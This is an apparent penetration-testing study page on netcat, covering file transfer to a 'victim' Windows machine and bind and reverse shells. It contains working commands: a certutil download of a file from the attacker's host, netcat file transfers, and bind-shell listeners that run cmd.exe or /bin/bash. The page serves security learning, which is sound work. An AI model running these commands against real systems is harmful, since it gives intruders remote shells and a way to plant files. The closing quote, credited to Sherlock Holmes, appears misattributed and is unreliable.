Portfolio

🐚Bind & Reverse Shells

Netcat Fundamentals

  • Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.

  • Netcat is available for both *NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.

  • Netcat utilizes a client-server communication architecture with two modes:

    • Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).

    • Server mode - Netcat can be used to listen for connections from clients on a specific port.

  • Netcat can be used by penetration testers to perform the following functionality:

    • Banner Grabbing

    • Port Scanning

    • Transferring Files

    • Bind/Reverse Shells </aside>

Usage of Netcat

The /usr/share/windows-binaries folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.

Transferring Files from Kali Linux to Windows

Using Python HTTP Server and Certutil

  1. Prepare Files:

    • Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.

  2. Host File on Python Server:

    • Start a Python HTTP server:

      python3 -m http.server

    • Files can now be accessed via http://<your_ip>:8000/<filename>.

  3. Download on Windows Using Certutil:

    • On the victim's Windows machine:

      certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>

Using Netcat (nc) for Direct Transfer

  1. Setup Netcat on Windows:

    • Receive files using Netcat:

      nc.exe -nvlp 1234 > <output-file-name>

  2. Send File from Kali Linux:

    • Send file from Kali Linux to Windows:

      nc -nv <win_ip> 1234 < <file-to-share>

    • Replace <win_ip> with the Windows machine's IP address.

Bind Shells

  • A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.

  • A Netcat listener can be setup to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

Bind Shells

Setting Up Bind Shells

Windows System

  • Establish Bind Shell:

    nc.exe -nvlp 1234 -e cmd.exe

    This command starts a Netcat listener (-l) on port 1234 (-p 1234) and executes (-e) cmd.exe upon connection, creating a bind shell.

  • Connect from Linux:

    nc -nv <win_ip> <port>

    Replace <win_ip> with the IP address of the Windows machine hosting the bind shell, and <port> with the port number (1234 in this example).

Linux System

  • Establish Bind Shell:

    nc -nvlp 1234 -c /bin/bash

    This command sets up a Netcat listener (-l) on port 1234 (-p 1234) and executes (-c) /bin/bash upon connection, creating a bind shell.

  • Connect from Windows:

    nc.exe -nv <linux_ip> <port>

    Replace <linux_ip> with the IP address of the Linux machine hosting the bind shell, and <port> with the port number (1234 in this example).

Reverse Shells

  • A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

Reverse Shells

Reverse Shell Cheatsheet

Hacker's Mantra: Humiliation is the favorite currency of the hacker. - Sherlock Holmes

PreviousSearching For ExploitsNextExploitation Frameworks

Last updated

Was this helpful?